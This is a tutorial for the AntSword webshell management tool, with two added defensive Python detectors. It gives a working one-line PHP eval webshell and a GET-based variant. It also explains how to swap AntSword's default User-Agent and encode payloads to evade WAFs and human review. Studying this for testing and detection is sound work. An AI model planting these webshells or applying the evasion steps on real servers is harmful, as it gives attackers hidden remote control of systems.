AntSword is a very easy-to-use post-exploitation tool for pentesters and security groups; it can also be used by webmasters. Do not use this tool on unauthorized servers/environments or for illegal purposes. It can be a better alternative to Weevely.
Description from Official website
AntSword is an open source, cross-platform website administration tool, being designed to meet the needs of penetration testers together with security researchers with permissions and/or authorizations as well as webmasters. Anyone shall not use it for illegal purposes and profitability. Besides that, publishing unauthorized modified version is also prohibited, or otherwise bear legal responsibilities.
1.1 Download correct file/zip file
The AntSword-Loader (a launcher) can be downloaded here: https://github.com/AntSwordProject/AntSword-Loader
It can be used on Microsoft Windows, Linux and macOS platforms.
1.2 Install or unzip content
Here, we unzip to “C:\Users\win10\Desktop\as-4.0.3”
1.3 Launch “AntSword.exe”
1.4 Click on “Initialize” button
1.5 Select a working directory
In this example, we create a working directory named “working-dir” under the main directory, i.e. “C:\Users\win10\Desktop\as-4.0.3\working-dir”
Select the folder, then click on the “Select folder” button
It will start to download the necessary package (which is “antSword-master.zip”)
(You might encounter the following error)
Unzip Error Code: [object Object]
If you encounter this error, follow 1.5.1
1.5.1 Fix the error
Open the working directory we have just selected. A folder named “antSword-master” and a zip file named “antSword-master.zip” may appear there; delete them.
1.5.2 Try to launch the AntSword-Loader with Admin rights, then repeat Step 1.3 to Step 1.5.
We should be able to see the following screen
When it’s done
Then this window will disappear and the program will terminate by itself.
1.6 Now we can launch “AntSword.exe” again; it is now ready to be used
2 Simple usage Demonstration
First, we need to deploy a webshell (sometimes called a backdoor or Trojan)
In this example we are going to use PHP
2.1 Create a php file “test.php”
2.2 Save the following content to the “test.php” file
<?php eval($_POST['mytestshell']); ?>
2.3 Upload to your own testing server (Please do not test on production server or any server which does not belong to you)
2.4 Right click on blank space, click on “Add”
2.5 Enter correct server details
Shell url: Your test.php path
Shell pwd: The shell password, which is the parameter name inside $_POST[...], “mytestshell” in this case
Shell type: PHP
2.6 Click on “Add” button
2.7 Now it will appear under “Shell Lists”
2.8 Double click on the item; we can now see all files on the server (as long as the user running the server process has the corresponding privileges)
We can also upload files to and download files from the selected folder, create, modify and delete files and folders, and even open a Terminal
It also supports other Shell types besides PHP
Send customized HTTP Header/Body value
Proxy, Plugin Store, Encoder etc.
AntSword official documentation: https://doc.u0u.us/en/getting_started/first_shell.html
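A defender's check for the test.php one-liner from step 2.2, as an added example that is not part of the original post or of AntSword: it walks a web root and reports PHP files that pass a request superglobal straight to eval(). The function names and the sample files, which are built in a temporary directory, are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# eval() applied directly to a request superglobal: the shape of test.php.
# Only this literal pattern is matched; encoded or split variants are not.
EVAL_ON_INPUT = re.compile(
    r"(?i:\beval)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\s*\["
)
PHP_SUFFIXES = (".php", ".phtml", ".inc")


def scan_webroot(root):
    """Return sorted (relative_path, line_no, superglobal) findings."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in PHP_SUFFIXES:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        for line_no, line in enumerate(text.splitlines(), start=1):
            match = EVAL_ON_INPUT.search(line)
            if match:
                rel = path.relative_to(root).as_posix()
                findings.append((rel, line_no, "$_" + match.group(1)))
    return sorted(findings)


def demo():
    """Scan a constructed sample web root created in a temp directory."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "uploads").mkdir()
        (root / "index.php").write_text("<?php echo 'hello'; ?>\n")
        (root / "uploads" / "test.php").write_text(
            "<?php eval($_POST['mytestshell']); ?>\n")
        (root / "uploads" / "t2.PHP").write_text(
            "<?php\n  EVAL ( $_GET['mytestshell'] );\n")
        # Not a PHP file, so it is skipped even though the text matches.
        (root / "notes.txt").write_text("eval($_POST['x'])\n")
        return scan_webroot(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```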
Bonus 1 – Use AntSword with PHP get request
Wondering how to use AntSword with $_GET rather than $_POST in PHP?
Here is how.
The PHP file
<?php eval($_POST['mytestshell']); ?>
<?php eval($_GET['mytestshell']); ?>
The Settings in AntSword
Shell url: http://xxxxxxxxxx.com/test.php?mytestshell=eval($_POST['mypswd']);
Shell pwd: mypswd
Bonus 2 – Modify User-Agents
By default, AntSword uses “antSword/v2.1” or “antSword/v2.0” as the user agent when updating the webshell information or connecting to the webshell, which can easily be recognized by a WAF or a human.
To change the User-Agent for AntSword, there are 2 files and 3 places we need to modify.
b2.1.1 File 1 is “request.js” under “X:\path\to\antsword\working-dir\antSword-master\modules\request.js”
Note: “working-dir” was created during Step 1.5
b2.1.2 Open “request.js” via Notepad or any text editor, Search for “USER_AGENT”
b2.1.3 Change “antSword/v2.1” to whatever you like, then save the file
b2.2.1 File 2 is “update.js” under “X:\path\to\antsword\working-dir\antSword-master\modules\update.js”
b2.2.2 Open “update.js” via Notepad or any text editor, Search for “User-Agent”
b2.2.3 Change “antSword/v2.0” to whatever you like, then save the file
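Seen from the server side, the default client strings named in Bonus 2 and the code-carrying URL from Bonus 1 both leave traces in a web access log. The following detection sketch is an added example, not part of the original post or of AntSword; it assumes Combined Log Format, and the sample log lines, rule names and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Combined Log Format: ip - user [time] "METHOD target PROTO" status size "referer" "ua"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Default client strings named on this page: antSword/v2.1 and antSword/v2.0.
DEFAULT_UA = re.compile(r"antSword/v\d", re.IGNORECASE)
# PHP code carried in the URL, as in the Bonus 1 shell URL.
CODE_IN_QUERY = re.compile(r"\beval\s*\(", re.IGNORECASE)

# Constructed sample lines (documentation IP ranges, invented timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Mar/2020:10:00:01 +0000] "POST /uploads/test.php HTTP/1.1" 200 512 "-" "antSword/v2.1"',
    '192.0.2.10 - - [10/Mar/2020:10:00:05 +0000] "POST /test.php?mytestshell=eval(%24_POST%5B%27mypswd%27%5D)%3B HTTP/1.1" 200 128 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '198.51.100.7 - - [10/Mar/2020:10:01:00 +0000] "GET /index.php?page=2 HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]


def classify(line):
    """Return (ip, path, reasons) for a suspicious line, otherwise None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    reasons = []
    if DEFAULT_UA.search(m["ua"]):
        reasons.append("default-antsword-user-agent")
    parts = urlsplit(m["target"])
    # Decode before matching so percent-encoded code is still seen.
    if CODE_IN_QUERY.search(unquote_plus(parts.query)):
        reasons.append("php-code-in-query-string")
    return (m["ip"], parts.path, reasons) if reasons else None


def detect(lines):
    """Classify every line and keep only the suspicious ones."""
    return [hit for hit in map(classify, lines) if hit]


if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(hit)
```

The user-agent rule only matches the default strings, so it is a quick first filter rather than a complete control. POST bodies are not recorded in a standard access log, so requests like the one in step 2.2 need a body-inspecting control or the file scan on the web root.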
Bonus 3 – Latest User-Agents
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Mozilla/5.0 (Linux; Android 8.0.0;) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Mobile Safari/537.36
Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/80.0.3987.95 Mobile/15E148 Safari/605.1
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/74.0
Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/74.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/74.0
Mozilla/5.0 (Android 8.0.0; Mobile; rv:61.0) Gecko/61.0 Firefox/68.0
Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/23.0 Mobile/16B92 Safari/605.1.15
IE 11/Internet Explorer 11 on Windows 10
Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Edge on Windows 10
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 Edg/80.0.361.62
Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)
There are many more features we can utilize, including encoding/decoding, which is very helpful when trying to evade a Web Application Firewall (WAF), plugins, multipart payloads, etc.
Warning: Do not use or test this tool on unauthorised servers.